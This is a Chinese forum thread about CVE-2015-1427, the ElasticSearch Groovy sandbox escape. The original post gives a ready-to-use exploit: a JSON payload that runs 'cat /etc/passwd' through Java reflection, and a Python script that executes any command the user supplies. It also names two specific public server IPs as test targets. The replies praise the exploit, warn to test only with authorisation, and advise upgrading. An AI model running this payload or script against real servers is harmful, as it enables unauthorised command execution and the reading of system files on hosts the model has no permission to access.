ElasticSearch Groovy脚本远程代码执行漏洞
ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynamic:true。
在1.3.0版本,开始使用groovy和sandbox来进行脚本执行,其中使用了白名单机制,限制了可以调用的类和方法等等。
但是因为Java中的反射机制,我们可以通过白名单中的类获取到Runtime,也就造成了远程代码执行漏洞,威力很大。
直接给出EXP
测试url:http://190.196.67.252:9200/_search?pretty
http://191.234.18.14:9200///_search?pretty
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
#!/usr/bin/env python
import urllib
import urllib2
import json
import sys
def execute(url,command):
parameters = {"size":1,
"script_fields":
{"iswin":
{"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).\
newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.\
class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\").\
getInputStream())).readLines()" % command,"lang": "groovy"}
}
}
data = json.dumps(parameters)
try:
request=urllib2.Request(url+"_search?pretty",data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')
response=urllib2.urlopen(request)
result = json.loads(response.read())["hits"]["hits"]["fields"]["iswin"]
for i in result:
print i
except Exception, e:
print e
if __name__ == '__main__':
if len(sys.argv) != 3:
print "usage %s url command" % sys.argv
else:
execute(sys.argv,sys.argv)
学习学习技术,加油! 支持,看起来不错呢! 支持中国红客联盟(ihonker.org) 感谢楼主的分享~
Re: ElasticSearch Groovy脚本远程代码执行漏洞
感谢楼主分享!这个漏洞的 EXP 写得很清楚,尤其是通过反射绕过沙盒的思路值得深入理解。不过提醒一下,测试时请务必使用自己授权的环境,或者搭建本地靶机验证,避免触碰法律红线。另外,文中提到的 `1.2.0` 版本默认禁用脚本执行,升级到受影响版本后反而开了沙盒却被绕过,这一点也很有启发——安全机制有时候反而会扩大攻击面。再次感谢整理!Re: ElasticSearch Groovy脚本远程代码执行漏洞
感谢楼主分享!CVE-2015-1427这个漏洞确实当年影响挺大的,Groovy沙箱绕过结合反射拿到Runtime,直接用脚本执行系统命令,利用链写得很清晰。楼主提供的两种EXP(手动POST和Python脚本)都很实用,方便测试。不过提醒一下,这类漏洞在生产环境威力很大,测试时一定要注意授权和边界,别误伤线上服务。建议有受影响版本的朋友及时升级到1.4.3及以上或禁用动态脚本。Re: ElasticSearch Groovy脚本远程代码执行漏洞
感谢分享,这个漏洞当年确实影响很大,利用反射绕过沙盒的思路也很经典。楼主给出的EXP很清晰,手动测试和Python脚本都方便验证。提醒下还在用旧版本的朋友尽快升级到1.4.3以上或禁用动态脚本,避免被扫到。
页:
[1]